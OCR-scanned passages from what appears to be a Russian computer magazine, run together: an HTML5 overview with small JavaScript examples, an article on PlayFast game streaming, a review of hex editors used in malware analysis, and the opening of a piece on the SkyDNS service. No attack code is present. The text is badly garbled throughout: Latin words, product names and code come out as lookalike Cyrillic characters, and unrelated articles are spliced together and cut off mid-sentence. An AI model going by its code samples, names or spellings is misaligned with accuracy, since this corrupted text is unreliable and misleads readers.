Последние версии скриптов ты найдешь на нашем диске. Для 
начала нужно сверстать страницы по всем правилам, а чтобы 
можно было использовать новые элементы разметки, и браузеры 
без их поддержки не ругались, лучше всего сразу применить 
готовый шаблон — НТМБ5 Воііегріаіе, который содержит в себе 
множество уже готовых фиксов и заменителей для браузеров без 
нативной поддержки нового стандарта. Если хочешь проверить, 
что поддерживает браузер пользователя, то тебе пригодится 
библиотека Мосіегпігг, которая тестирует браузер на поддержку 
множества разных фич и выдает это в виде АРІ или просто как 
свойства элемента бобу. Заметь, что скрипт только тестирует 
наличие или отсутствие поддержки, а не эмулирует недостаю- 
щий функционал. 

Для выводов простой векторной графики и рисования можно 
применить Рарбаеі, созданный, кстати, нашим программистом. 
Библиотека может работать как с 5ѴѲ, так и с ѴМБ, и скрывает 
от тебя все внутренности рисования. А заменить сапѵаз поможет 
разработка от гугла — ехСапѵаз, с которой даже тупой ІЕ7 сможет 
рисовать все, что ты ему прикажешь. Хранить данные можно при 
помощи Зеззіопзіогаде (единственный из скриптов, который 
честно эмулирует все ѴѴеЬБіогаде АРІ) или более знакомого нам 
)51;оге (плагин к)Оиегу), который хотя и использует свой АРІ, но 
что поделать. Хочешь воспроизводить видео и построить второй 
ѴоиТиЬе (ладно, чего уж там, РогпТиЬе тоже сойдет) — можешь 
использовать плеер Ѵібео Іюг ЕѵегуЬобу, который добавляет 
поддержку тега <ѵібео> при помощи 65-библиотеки и Ріазб- 
проигрывателя. Всякие рюшечки в формы добавить? Легко при 
помощи библиотеки \Л/еЬРогтз2, работающей во всех браузерах. 
ѴѴеЬЗоскеІ — самая бедная часть, потому как полноценно ее эму- 
лирует только один проект. Разработка ѵѵеб-зоскеіз^'з использует 
небольшую 65-обертку над Ріазб’ем. На сегодня это лучшее реше- 
ние, умеющее проходить даже через разные умные и не очень 
прокси и файерволы. Для обмена сообщениями между разными 
фреймами, в том числе и с разных доменов подойдет библио- 
тека еазуХБМ. Если очень захотелось уже сейчас использовать 
новую модель селекторов или же другие фичи из С55 3, здесь на 
помощь придет зеіесбѵігг и сззЗріе, добавляющий свойства скру- 
гления уголков блоков и прочие радости жизни. 
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<МтІ>5сІос1'ог — блог о всех тонкостях 
нового НТЛЛІ. 



На самом деле для реально крутых приложений этого 
недостаточно. Об этом хорошо знают и понимают в 
ѴѴЗС, поэтому хранению данных уделено столь боль- 
шое место в текущей спецификации НТМІ_5. Так, на 
радость разработчиками, кроме простого (и тупого) 
хранения строк, пусть и постоянного, можно надеяться 
и на ѴѴеЬ 50Ь ОаІаЬазе — попытку предоставить в рас- 
поряжение скрипту свою собственную полноценную 
ЗОИ базу данных (обычно это ЗОЫіе). 

Интернет? Нет, оффлайн! 

Раньше работать с сайтами было можно, даже не имея 
доступа в Сеть — открыл себе нужные страницы и 
читай, хоть на весь день, отключившись от модема. С 
сегодняшними интерактивными сайтами такое уже не 
получится. Для многих действий понадобится устойчи- 
вая связь с сервером проекта, ведь ты хочешь мгновен- 
но видеть, что твои друзья делают рядом. Но ведь слу- 
чается, что интернет просто отрубается, верно? Раньше 
браузер мог даже не заметить кратковременных отклю- 
чений, максимум это грозило тем, что не отправляются 
формы. Современному же приложению в браузере надо 
точно знать, есть у него выход в инет или нет. И, как 
опытный разработчик, могу тебе сказать: узнать это не 
так уж и просто. Для облегчения этой задачи в НТМІ_5 
появились новые события — оббііпе/опііпе, которые опо- 
вещают твою программу о перебоях в соединении. Это 
здорово помогает, например, при написании текстов 
— если нет интернета, то вместо отправки заполненной 
формы на сервер достаточно воспользоваться одним 
из предложенных хранилищ данных ШОМ Зіогаде) и 
сохранить в него все, что ты так кропотливо набивал, а 
уже потом, когда появится доступ в Сеть, отправить это 
на сервер. Многие сервисы работы с документами или 
почтой нуждаются в таком уже сейчас, и им приходится 
всячески извращаться, чтобы узнать то, что в НТМІ_5 
будет доступно одной строкой! 

ЛосшпепЦ .Ъосіу . асІсІЕѵепЦЬізЦепег ( "оТТІіпе" , 

ГипсЦіоп () { 

аІегЦ (' Чувак , звони провайдеру, твоя 

сетка упала ! 1 ) ) ; 

} , Еаізе) ; 

Но что делать, если твой сайт может прекрасно жить 
и без инета, лишь бы были те несколько файлов, без 
которых ну просто никак не обойтись? И это решается. 
Достаточно использовать арріісаііоп сасЬе или оЛІіпе 
гезоигсе. Это механизм, когда ты в специальном фай- 
лике (манифесте) описываешь ссылки на все нужные 
странице файлы, необходимые для того, чтобы работать 
без связи с сервером. Они автоматически будут загру- 
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Привнеси С553 в любой браузер за секунду! 



жены и заботливо сохранены браузером, чтобы быть 
наготове на случай обрыва связи. В отличие от настро- 
ек кэширования, это работает более гарантированно, 
и браузер не может пропустить указанный файл — все 
они в обязательном порядке будут заблаговременно 
загружены и сохранены. Уже сейчас это можно попро- 
бовать в Рігебох 3.5 и выше. 

ѴѴеЬ ѴѴогкегз — солнце све- 
тит, рабы пашут 

В инете просто куча сайтов, на которые заходишь и 
понимаешь, что можно выбросить в топку твой 4-х 
ядерный камень и 8 Гб оперативки — все это сжи- 
рает один сайт! Причиной тормозов часто является 
РІазГі, но не он один. Разработчики знают: ЗаѵаЭсгірІ 
в браузере не предназначен для серьезных вычисле- 
ний. Только в последних версиях браузеры научились 
выделять скрипты в отдельные потоки (первым это взял 
на вооружение СЬготе, что позволило ему назваться 
самым быстрым браузером на планете). Тем не менее, в 
рамках страницы все скрипты работают в одном потоке, 
даже если процессор может выполнять их несколько 
одновременно. Асинхронным, то есть исполняющим- 
ся параллельно был и есть только один специальный 
системный объект ХМиНТТРРецііезІ, который может 
делать запросы на сервер, не прерывая основную 
работу. Но что же делать, если сегодня ты уже хочешь 
не просто загружать фото на свою страничку, а требу- 
ешь возможности ее обработать, создавать коллажи 
или фотожабы, да и просто убрать красные глаза? И все 
это на той же страничке, без необходимости отправлять 
фото на сервер. 

Приближая возможности веба к обычным приложени- 
ям, следовало развязать руки разработчикам, дав воз- 
можность загрузить клиентскую машину по максимуму. 
Так появилась спецификация ѴѴеЬѴѴогкегз, впервые 
реализованная «в коде» еще Ѳоодіе Оеагз. По сути, это 
возможность выделить некоторый участок кода (набор 
функций), которые будут исполняться в отдельном 
фоновом потоке, никак не мешая обработке основной 
страницы, не тормозя отрисовку йОМ-дерева и другие 
операции. Конечно, воркеры имеют множество огра- 
ничений (чтобы не наглели). Они не могут обращаться 
к переменным основной страницы или к йОМ-дереву 
страницы, не видят ее переменные. Разрешена только 
загрузка с удаленных узлов и общение с родительским 
процессом, где они были созданы через механизм 
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На сегодня только боодіе СЬготе обеспечивает наибо- 
лее полную поддержку 30 в браузере через ѴѴеЬСІ. 



обмена сообщениями (обычными строками или ^ОЫ-данными]. 
Простой пример: 

ѵаг ѵгогкег = пехѵ Шогкег ( "ту_хакіпд_зсгірк .33") ; 

члгогкег . оптеззаде = кипскіоп (еѵепк ) { 

аіегк ( ' Сотрикіпд кіпізкесі, гезиік: * + еѵепк . 

сіака) 

} ; 

члгогкег . розкМеззаде ( " 5 " ) ; 

В воркере (файл ту_хактд_зспр1Д5) может быть любой код 35, не 
взаимодействующий с 00М, а чтобы он мог общаться с внешним 
миром, достаточно объявить обработчик события оптеззаде, кото- 
рый срабатывает, когда воркеру посылают данные для обработки. 
Результат возвращается через вызов метода розіМеззаде, который 
связывает код с основной страницей. 

Можно смело возлагать на такой скрипт трудоемкие расчеты, 
например, в стратегических или ПР6-играх, фоторедакторах и там, 
где раньше едва справлялся ЕІазЬ или просто тупо вис браузер. 
Спецификация воркеров вышла на удивление простой и гибкой, да 
так, что многие серверные приложения взяли ее на вооружения, 
реализуя таким образом многопоточность (например, серверный 
Заѵа5сгірІ ЫосІеЗЗ). Плагины для Еігеіюх, которые также могут быть 
написаны на чистом 35, могут использовать ѴѴеЬѴѴогкег для выне- 
сения ресурсоемких обработок в другой поток. Для иллюстрации 
практической пользы от воркеров, легендарный Заѵа5сгір1:-гуру 
Джон Резиг, создатель ] 0 и е гу, портировал из С на Заѵа5сгірІ алго- 
ритм поиска коллизий в 8НА-1 хеше (в рамках конкурса, органи- 
зованного НиЬу-хостером Епдіпе ѴагсІ). Сам код ты сможешь найти 
на нашем ОѴй, но прирост скорости от использования многопоточ- 
ности в разных браузерах составил от двух до пяти раз. А это, как 
мне кажется, очень даже отличный результат. 

А может, хватит? 

Ты думаешь, на этом нововведения в НТМІ_5 закончились? Нет, 
там еще много чего припасено. Например, сейчас во всех брау- 
зерах перетаскивание чего-либо мышью (Огад-п-Огор) приводит 
к ощутимым тормозам. Особенно этим славится ІЕ (а где ж он не 
тормозит-то?), поэтому все сложные веб-сайты с большим количе- 
ством информации работают в страничном интерфейсе, не пыта- 
ясь наследовать десктоп с таскающимися окнами. Разработчики 
НТМІ_5 обещают, что Огад-п-Огор будет нативный и ускоряться 
браузером, поэтому даже с огромным ООМ-деревом и кучей 055- 
стилей все будет летать. Вдобавок появится возможность таскать 
не только элементы в пределах окна, но и немного выйти за 
область браузера, разрешив загружать файлы прямым перетаски- 
ванием прямо с рабочего стола или из другого приложения. Это 
уже сейчас можно попробовать в Ѳоодіе СЬготе, приложив аттач к 
письму Отаіі с помощью Огад’п’Огор’а. Вообще, в спецификации 



обсуждается предоставление большей свободы в плане работы с 
локальными данными, например, ЕіІеРеасІегАРІ, который позволит 
коду напрямую читать файлы с диска юзера (конечно, не все и не 
везде). И хотя начальные варианты поддержки уже появились в 
последних сборках Рігеіюх, это АРІ до конца не обрело свое место 
в стандарте. 

О революционном решении добавить, наконец, в веб то, чего всег- 
да не хватало — нативную поддержку ѴѴеЬВоскеІз (двусторонней 
постоянной связи с сервером, почти настоящие ТСР-сокеты), мы 
уже рассказывали подробнее в прошлых номерах (статья «Реал- 
тайм в Вебе»), На сегодня это одна из самых обсуждаемых фич, 
которая уже реализована в последних релизах браузера (кроме 
злосчастного ІЕ9). И пусть редакции стандарта на ѴѴеЬВоскеІз 
могут изменяться и быть порой несовместимыми между собой, 
дырявыми в плане безопасности — без сомнения именно они 
будут главным локомотивом движения веб-сайтов в сторону при- 
ложений. 

В истории Сети с середины 90-х годов пытались добавить настоя- 
щую 30-графику на сайты. Разрабатывались специальные языки 
(вроде уже умершего ѴРМЦ создавались плагины и библиотеки, 
начиная от полностью новых (Вііпк 30, ѴѴіІсІІапдепІ;) и заканчивая 
расширениями привычных апплетов Заѵа (ЗаѵаЗй) и ЕІазЬ. Ничего 
не пошло, пока не решили — а зачем вообще что-то придумывать, 
если все уже придумано (и украдено) до нас? На том и решили. 

За основу взяли индустриальный стандарт Ореп(ЗІ_ (его особенно 
обожает легендарный Джон Кармайк, создатель Ооот и Оиаке) 
и портировали с некоторыми изменениями его АРІ прямиком в 
ЗаѵаЗсгірІ:. Так на свет появилась технология ѴѴеЬ6І_, которая сей- 
час лучше всего поддерживается СЬготе. Здесь, как и в сапѵаз- 
элементе, есть где разгуляться видеокарте: обещается, что графи- 
ка будет ускорена по полной программе. Однако эта часть еще не 
входит в спецификацию и развивается сторонними компаниями. 
Но уже одно обещание единого графического АРІ для работы с 
настоящим честным Зй и на любимом Заѵа5сгірІ — это подвиг! А 
как применить — это мы уже сами придумаем; будем писать игры, 
выводить классные графики и диаграммы, рисовать карты. Для 
игр, кстати, уже сделали и развивают честный игровой движок 
СоррегЫсЫ;. 

Как жить дальше? 

НТМІ_5 — это определенно будущее интернета. Технологии, кото- 
рые входят в этот стандарт, позволяют с легкостью делать на веб- 
страницах то, что раньше было доступно только суровым С++ про- 
граммистам на десктопах. Сразу все, конечно, на голову не свалится, 
новые возможности постепенно внедряются в браузеры. Но не 
стоит думать, что раз стандарт в далеком будущем, то ничего из его 
возможностей нельзя использовать сейчас. Многие браузеры под- 
держивают новшества НТМІ_5, но вот только одна засада — каждый 
норовит реализовать это по-своему.зс 
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СТРИММИНГ ИГР: КАК ЭТО 

Разбираемся во внутренностях 
'ДпЛІД/О! технологии РІауРазІ 

Потоковое аудио. Потоковое видео. Теперь - игры в потоковом режиме. Когда мы в про- 
шлом номере рассказывали о сервисе Ріауіазі, нас сильно заинтересовала технология, 
позволяющая реализовать стримминг игры. Сложно представить, что любую игрушку 
можно вот так просто загружать в потоковом режиме и начать играть, имея на старте 
лишь часть ее файлов. Как это работает изнутри? Требуется ли взаимодействие с разра- 
ботчиками игры? 



У НОВОЙ ТЕХНОЛОГИИ ДЛЯ РАСПРОСТРАНЕНИЯ ИГР ЧЕРЕЗ ИНТЕРНЕТ 
ЕСТЬ ТРИ НЕОСПОРИМЫХ ПЛЮСА. Во-первых, покупать через интер- 
нет удобно и выгодно: игры стоят дешевле, чем обычном магазине. 
Во-вторых, можно бесплатно «пощупать» игрушку до покупки и 
принять решение, нужна она тебе или нет. И, в-третьих, и это самое 
главное, технология позволяет не скачивать образ игры полностью, 
чтобы приступить к ее прохождению - достаточно скачать лишь 
5-15% от общего размера файлов. При этом вся оставшаяся часть 
будет незаметно подкачиваться с сервера в фоновом режиме. 

Звучит здорово, но как это работает? 

Анализ игры 

Может показаться, что реализовать стримминг игры можно разве 
только в кооперации с ее разработчиками, но это нетак. Одна из 
важных фишектехнологии Ріаубазі; заключается втом, что никаких 
изменений в исходный код не вносится. Мало этого, вмешательство 
разработчиков вообще нетребуется, а вся реализация потоковой 
загрузки возлагается на плечи механизма РІауЕазІ:. 

Любое приложение в ходе запуска и далее работы обращается опре- 
деленным файлам. Как правило, для запуска игры используется строго 
определенный переченьфайлов, а костальным приложение обраща- 
ется по мере необходимости (в нашем случае, по мере прохождения 
игры). Если знать, какие файлы и данные являются критичными для 
запуска, к каким документам происходитобращение в ходе первых 
минут игры, можно создать минимальный ее образ. Если все сделано 
правильно, такой сборки будет достаточно нетолько для запуска, но 
и для полноценной игры втечение некоторого времени. Технология 
РІауЕазІ как раз и позволяетэто реализовать. Но прежде чем игра 
готова кстриммингу, она проходит несколько стадий тестирования, 
тренировоки конвертаций. Все начинается с первичного тестирова- 
ния игры на корректную работу в ОС (ѴѴіпсІоѵѵ5 ѴІ5І;а/ХР/7). При помощи 
специальныхутилит-мониторов отслеживаются активность файловой 
системы, обращения к реестру, выясняется, какие дополнительные 
программы и кодеки необходимы для правильной работы игры. На 
основе этого анализа создается образ диска со всеми необходимыми 
файлами, атакже сценарий для запуска игры ссерверов компании. 
Помимо этого одним из важнейших шагов в обработке игр потехно- 
логии Ріаубазі; является защита игр от взлома. Для этого используются 
нетолько новейшие, но и проверенные временем самые надежные 
системы. Кактолько защищенный образ готов, игра готова к так назы- 
ваемой тренировке. 

Тренировка 

Во время этого этапа игра несколько раз отыгрывается по опреде- 
ленному сценариюзаранее рассчитанное количество часов. Но 
здесь не только проверяется, правильно ли были отобраны файлы 
для создания первичного образа (такназываемого прелоада). В 
это время специальный драйвер файловой системы фиксируетвсе 
обращения к блокам данных, атакже время обращения ккаждомуиз 
них. Эта информация передается на центральный сервер, где хранятся 




Создание образа игры по технологии РІауРазГ 

логи тренировочных сессий. В соответствии ссохраненной в логах 
информацией происходит перераспределение и выстраивание блоков 
данных на виртуальном диске в определенной последовательности. 
Таким образом, данные, обращение ккоторым произошло раньше, 
помещаются перед теми, к которым система обратилась в более 
позднее время. Кактолько информация организована в «правильной» 
последовательности, составляется карта прогрессивной загрузки, так 
необходимая для реализации стимминга. На самом последнем этапе 
все данные подлежат компрессии и разбивке на микро-блоки. После 
всех манипуляций, данный виртуальный диске реорганизованной 
последовательностью данных можетбыть размещен на боевом серве- 
ре компании (в облаке), а пользователи могут оценить игру и скачатьее 
в десятки раз быстрее, чем если бы загружали образ игры полностью. 
Именно здесь находится и сервер лицензий, который осуществля- 
ет контрольтриального периода с точностью до секунды. В самой 
технологии заложены алгоритмы защиты игры, а клиенту представ- 
ляется гибкая схема продаж: единовременной покупки, аренды игр и 
подписки. 

Запуска игры на стороне клиента 

Важной частью системы является приложение РІауЕазІ;- менеджер - 
это программа-клиент, которая устанавливается на компьютере конеч- 
ного пользователя. Кактолько пользователь принял решение начать 
игру, оно проверяетсистему пользователя на наличие необходимых 
компонентов для инициализации игрового файла. Еслитребуется 
установка какого-то дополнительного программного обеспечения, 
пользователь увидит подсказку системы, а также ссылку на безопас- 
ный источник, откуда его можно скачать и инсталлировать. Ну, а если 
все зависимости удовлетворены, начинается загрузка данных, необ- 
ходимых для запуска игры. Из кэш-файла информация передается 
на виртуальный диск пользовательского компьютера, который также 
создается менеджером РІауЕазІ. Когда игровая сессия уже началась, 
остальной объем данных загружается автоматически в фоновом режи- 
ме. Амытем временем можем спокойно наслаждаться игрой.ЗГ 
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о После окончания цикла статей «Лучшие инструменты пентестера» в 
редакцию пришло немало писем с просьбой сделать подборку Нех- 
редакторов. Интерес, конечно, представляет не возможность 
редактировать бинарные данные, а дополнительные фичи вроде 
автоматического распознавания структур данных 
и дизассемблирования кода. Чтобы сделать обзор, мы выяснили 
мнения людей, которым чаще других приходится ковыряться с такими 
инструментами, - вирусных аналитиков. И вот что они нам рассказали. 



ЛЮБОЙ НЕХ-РЕДАКТОР ПОЗВОЛЯЕТ ИССЛЕДОВАТЬ И 
МОДИФИЦИРОВАТЬ ФАЙЛ НА НИЗКОМ УРОВНЕ, ОПЕРИРУЯ С БИТАМИ 
И БАЙТАМИ. Содержание файла представляется в шестнадцатерич- 
ной форме. Это базовый функционал. Однако некоторые редакторы 
предлагают пользователям намного большее, позволяя разобраться, 
собственно, что есть что в том непонятном наборе символов, который 
появляется при открытии файла. Для этого автоматически извлека- 



ются А5СІІ и ІІпісосІе строки, осуществляется поиск известных паттер- 
нов, выполняется распознавание основных структур данных и многое 
другое. Шестнадцатеричных редакторов довольно много, но если мы 
решили рассмотреть их в контексте исследования образцов малвари, 
то легко выделить некоторые из них. Лишь немногие оказываются 
реально полезными для анализа зловредного кода и исследования 
зараженных документов (скажем, РЭР). 



► 032 
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010 Есіііог: шаблоны структур в действии 



ЛЛсАіее РіІеІпзідИТ 

ЕіІеІпзідЫ: — это бесплатный Ьех-редактор для ѴѴіпсІоѵѵз 
от компании МсАІюе ЬаЬБ. Продукт, само собой, выпол- 
няет весь стандартный функционал, сопутствующий 
подобному софту, предлагая удобный интерфейс для 
просмотра и редактирования файлов в шестнадцате- 
ричном и текстовом режимах. Но это лишь капля в море, 
если посмотреть на весь его функционал. Начать стоит 
с того, что РіІеІпзідЫ; способен парсить структуру испол- 
няемых бинарников для ѴѴіпсІоѵѵз (РЕ файлов), а также 
01_Е-объектов МісгозоИ ОНісе. Мало этого, пользователю 
предлагается встроенный х86 дизассемблер. Достаточно 
выбрать часть файла, которую хочешь просмотреть в 
виде читаемого кода, и РіІеІпзідЫ покажет этот фрагмент 
как листинг ассемблерных инструкций. Дизассемблер 
особенно полезен, когда ищешь шеллкод в зловредных 
файлах. Среди других опций, которые придутся по душе 
реверсерам, возможность импортировать объявления 
структур. Для этого программе достаточно указать заго- 
ловочный файл с объявлениями вроде: 

зСгисС АЖНеасІег { 

БШЕБ сЬЗігеОЕ; // №лп ЬуСез іп АпіНеасІег 

ШЮКБ сРгатез; // ЫитЬег о:Е ипідие Ісопз 

ЦЖЖБ сЗСерз; // ЫитЬег оі: ВІіСз 

} ; 

В этом случае программа сама будет парсить подобные 
конструкции. Впрочем, и по умолчанию предлагается 
немало интуитивных алгоритмов для обработки кода. 
Речь, прежде всего, идет о декодировании многих мето- 
дов обфускации (хог, асИ, зЫИ, Вазе64 и т.д.]: встроенные 
скрипты щелкают подобную криптозащиту на раз-два. 

Тут надо заметить, что в качестве объекта исследования 
необязательно должен быступать бинарник, это может 
быть и обычная веб-страница, вызывающая подозрения. 
Многие действия программа позволяет автоматизиро- 
вать с помощью простых сценариев на ЧаѵаЗсгірІ или 
модулей на Руібоп, которых написано уже немало. Увы, 
при всех достоинствах у РіІеІпзідЫ есть и серьезный 
недостаток, выражающийся в невозможности обраба- 
тывать большие файлы. К примеру, если попытаешься 
скормить утилите файл размером в 400-500 Мб, вылетает 
ошибка «Раііесі Іо ореп боситеЫ». 



Нех ЕсМог №о: просматриваем структуры 



платная и продвинутая коммерческая версия. Егееѵѵаге- 
вариант — это добротный, но мало чем примечательный 
НЕХ-редактор, имеющий классный настраиваемый 
интерфейс с поддержкой разных цветовых схем. Не 
более того. А вот профессиональная версия Нех Ебііог 
Ыео предоставляет несколько полезных опций, которые 
могут быть крайне полезны при анализе бинарников. К 
примеру, пользователь получает возможность декоди- 
рования кода, закриптованного с помощью наиболее 
общих алгоритмов. Помимо этого, появляется возмож- 
ность просмотра и редактирования локальных ресурсов 
типа ІЧТЕЗ-потоков, локальных дисков, памяти процесса, 
а также оперативки. В самой полной версии появляется 
и поддержка скриптового языка, позволяющая автома- 
тизировать многие процессы с помощью сценариев на 
ѴВЗсгірІ и ЧаѵаБсгірЕ Но самый смак в том, что к твоим 
услугам предоставляется встроенный дизассемблер, 
который работает и с х86, и с х64, и с .ІЧЕТ-бинарниками! 
Еще одна фича — быстрое создание патчей, основанное 
на сравнении двух бинарников. Звучит впечатляюще, 
но лучше ли он, чем РіІеІпзідЫ;? Скорее, нет. РіІеІпзідЫ 
в целом выглядит более функционально. С другой 
стороны, любая, в том числе бесплатная, версия Нех 
Есіііюг ІЧео отлично работает даже с очень большими 
файлами и позволяет искать А5СІІ и ІІпісосІе-строки. 
Дизассемблер здесь не ограничивается одной лишь х86 
платформой, а встроенный редактор ресурсов очень удо- 
бен. Есть над чем подумать. 



РІехНех 



Нех Есіііог Ыео 



Существует две версии этого шестнадцатеричного 
редактора от компании НОИ Зоііѵѵаге: простая бес- 



ЕІехНех — это мощный коммерческий Ьех-редактор 
от компании Неаѵепіооіз Зоііѵѵаге, который включа- 
ет многие из функций, доступных в Нех Есіііог ІЧео. 
Единственное чего здесь нет — это, пожалуй, поддержка 
скриптов. Зато этот полнофункциональный редактор 
одинаково хорошо обрабатывает бинарники, ОЕЕ-файлы, 
физические диски и альтернативные ІЧТЕЗ-потоки. 
Последнее особенно важно, потому что ЕІехНех позволя- 
ет редактировать те данные, которые другие редакторы 
могут даже не увидеть. К тому же, сразу чувствуется 
ориентированность на работу с большими массивами 
информации: какой бы размер ни был у файла, нави- 
гация по нему осуществляется без каких-либо лагов и 
тормозов. Для еще большего удобства работает система 
закладок. При этом ЕІехНех непрерывно ведет историю 
всех операций — можно отменить любое действие, про- 
сто выбрав его из списка изменений (ипсіо-іізі не огра- 
ничен)! В ЕІехНех поддерживаются все необходимые 



Скажи, вот в каком оф- 
флайн НЕХ- редакто ре 
есть возможность 
коллективной работы 
нескольких людей? Я 
такого не знаю. Зато 
это предоставляет 
совершенно бесплат- 
ный онлайн-сервис 
Ьехразіе. Достаточно 
поделиться ссылкой 
на проект(напри- 
мер, Ьехразіе.сот/ 
ѴѴѵѵѵХ04еѴ), чтобы 
к нему мог подклю- 
читься кто-то еще. 
Действует простей- 
шая система контроля 
версий — каждое зна- 
чимое изменение не- 
обходимо сохранить. 
Интерфейс очень 
здорово реализован 
на АбАХ'е, поэтому 
складывается ощу- 
щение, что работаешь 
в самой обычной, но 
очень простой про- 
грамме. 
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Исследуем бинарник в РІехНЕХ 



Бесплатный Ьех-редактор 
от Мс/Мее ЬаЬз 



Необычный интерфейс Ніеѵѵ 



операции с бинарными данными, поиск А5СІІ и ІІпісобе-строк. Если 
необходимо обрабатывать структуру с заранее известным форматом, 
задать ее параметры не составит труда с помощью специальных 
инструментов. В результате получаем отличный Ьех-редактор, но 
все-таки сильно уступающий тому же РіІеІпзідЫ:. Единственная при- 
мечательная опция — это обработка СИЕ-файлов, но и тут есть про- 
блемы. Несколько раз при попытке открыть зараженный ОЬЕ, про- 
грамма вылетала с ошибкой «ТЬе босЫе баз Ьееп соггиріеб». 



гасіаге — Нех-редактор для ипіх 



010 Ебііог — известный коммерческий продукт, разработанный 
ЗѵѵееіЗсаре ЗоЫл/аге. Если сравнивать его с предыдущими тремя 
инструментами, то он умеет все: поддерживает работу с очень 
большими файлами, предоставляет классные возможности по 
оперированию с данными, позволяет редактировать локальные 
ресурсы, имеет систему скриптинга для автоматизации рутинных 
действий (более 140 различных функций к твоим услугам). А еще у 
010 Ебііог есть изюминка, уникальная фишка. Редактор уделывает 
всех благодаря возможности парсить различные форматы файлов, 
используя собственную библиотеку шаблонов (так называемые 
Віпагу Тетріаіез). Вот здесь ему нет равных. Над шаблонами рабо- 
тают множество энтузиастов по всему миру, забивая различные 
структуры форматов и данных. В результате процесс навигации по 
различным форматам файлов становится прозрачным и понятным. 
Это касается в том числе и обработки бинарников для винды (РЕ 
файлам), файлов-ярлычков ѴѴіпбоѵѵз (и\ІК), Хір-архивов, файлов 
баѵа-классов и многого другого. Всю прелесть этой фишки многие 
смогли осознать, когда известный специалист по безопасности 
йібіег Эіеѵепз создал для 010 Ебііог шаблон для парсинга РОЕ- 
файлов. Вкупе с другими утилитами это серьезно упростило анализ 
зараженных РОЕ-документов, которые последние полгода не пере- 
стают удивлять количеством мест, откуда можно эксплуатировать 
программу-читалку. Добавляем сюда классную функцию для срав- 
нения бинарников, калькулятор с С-подобным синтаксисом, кон- 
вертирование данных между АВСІІ, ЕВСОІС, ІІпісобе-форматами 
и получаем очень привлекательный инструмент с уникальными 
фишками. 

Ніеѵѵ 

Ніеѵѵ, в плане способа распространения, мало чем отличается от 
своих коллег. Это тоже коммерческий продукт, который разработал 
наш соотечественник Евгений Сусликов. Программа, имеющая дол- 
гую историю, сильно полюбилась многим специалистам по инфор- 
мационной безопасности. Тому есть вполне очевидные причины — 
мощные возможности для исследования и редактирования структу- 
ры и содержания исполняемых файлов как винды (РЕ), так и бинар- 
ников для Ыпих (ЕЬР). Другая очень полезная фича для реверсинга 
— встроенный х86-64 ассемблер и дизассемблер. Последний даже 
поддерживает инструкции АРМ. Не надо говорить, что редактор 
отлично переваривает большие файлы и позволяет редактировать 
логические и физические диски. Многие задачи легко автоматизи- 
руются за счет системы клавиатурных макросов, скриптов и даже 
АРІ для разработки расширений (Ніеѵѵ Ехігепаі Мобиіез). Но прежде 



чем рваться в бой, учти — интерфейс Ніеѵѵ представляет собой 005- 
подобное окно, работать с которым с непривычки довольно неудоб- 
но. Зато можешь прочувствовать на себе всю прелесть олдскула. 

Расіаге 

Рабате — это набор бесплатных утилит для ІІпіх-платформы, кото- 
рые предоставляют классные функции для редактирования файлов 
в НЕХ-режиме. В него входит непосредственно сам Ьех-редактор 
(гасіаге) с возможностью открытия локальных и удаленных файлов. 
Программа анализирует исполняемые файлы различных форматов, 
как линуксовых (Е1_Р), так и виндовых (РЕ). Помимо редактирования 
в пакете Рабате есть инструмент для сравнения бинарных файлов 
(габЫ) и встроенный ассемблер/дизассемблер. А лично мне пару 
раз пригодился инструмент для генерации шеллкодов (газе). Любые 
операции легко можно автоматизировать и подогнать под себя за 
счет скриптовой системы. Из минусов, опять же, можно отметить 
отсутствие 6111-интерфейса — все действия осуществляются из 
командной строки, а полноценно работать с утилитами получится, 
только прочитав документацию. С другой стороны, на сайте есть 
наглядные скринкасты, демонстрирующие как основные моменты, 
так и маленькие секреты вроде подключения РуіЬоп-плагина. 

Так что же выбрать? 

Мы рассмотрели несколько мощных Ьех-редакторов, которые вклю- 
чают в себя полезные опции для анализа подозрительных файлов. 
Из всех продуктов серьезно выделяется РіІеІпзідЫ, который при 
всем своем функционале (а он действительно впечатляет) оста- 
ется бесплатным. 010 Ебііог предоставляет большое количество 
шаблонов для обработки самых разных файлов, в том числе РОЕ- 
документов. Это мега-фишка, которой нельзя пренебрегать. Эти два 
редактора я использую постоянно; для работы аналитика, пожа- 
луй, они подходят лучше всего. Если говорить о работе под ІІпіх- 
платформой, то, конечно, нельзя забывать о Рабате. Пакет предла- 
гает очень мощные возможности, хотя он и сложен в использовании 
из-за того, что работает из командной строки. Не очень дружелюбен 
и Ніеѵѵ, несмотря на то, что его возможности, безусловно, позволяют 
выполнять самые разные операции с бинарниками. К тому же, Ніеѵѵ 
— это выбор большого количество настоящих профи, а это дорогого 
стоит (и многое значит). Что касается Нех Ебііог І\Іео, то его стоит 
взять на вооружение, если тебя интересует возможность дизассем- 
блировать х86, х64 и ,І\ІЕТ код. цс 
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Сегодня я расскажу об одном интересном сервисе, который позволяет 
проапгрейдить традиционный и получить несколько серьезных 
бонусов без установки каких-либо дополнительных приложений. 



Любой админ знает о маленьких пакетах, уходящих на 53 порт 
провайдера, — это запросы к серверу БЫ8. Когда мы набираем 
в браузере ѵѵѵѵѵѵ.хакер.ги . мы отправляем ему запрос с просьбой 
вернуть ІР-адрес узла. Быстрый резолвинг доменного имени поло- 
жительно влияет на скорость загрузки страниц. Ниже мы как раз 
поговорим о новом продвинутом «акселераторе» системы БІ\І8. 

Ближе ОЫ5 — быстрее отклик 

Речь идет о 8куБЫ8 [ ѵѵѵѵѵѵ.зкѵсіпз.ги ] — новом сервисе, разработ- 
чики которого обещают ускорить работу службы БЫ8 и обеспечить 
фильтрацию разных вредных сайтов и баннерных сетей. Причем 
без необходимости устанавливать какие-либо программы у себя 
на компе. Как они это собираются сделать? 

Скорость подгрузки страницы зависит оттого, насколько быстро 
отвечает сервер БЫ8 (кроме случаев, когда информация о нужном 
имени есть у нас в кэше]. Парни из 8куБЫ8, похоже, об этом точно 
знают. Обещанное ускорение работы БЫ8 достигается за счет 
сети распределенных по территории России серверов. Сетевая 
архитектура позволяет отправлять твои запросы именно на бли- 
жайший сервер, за счет чего достигается уменьшение отклика, а, 
следовательно, и повышение скорости загрузки сайтов. На момент 
неспешного написания статьи на сайте ЗкуБЫЗ заявлено четыре 
сервера в крупных городах России. Это Москва, Питер, Екатеринбург 
и Новосибирск, на очереди остальные города-миллионники. Если 
учесть, что лично я часто прописываю в качестве БЫ8 по умолчанию 
сервера, расположенного где-то там за бугром (местные провайде- 
ры все никак не озаботятся установкой нормального оборудования 
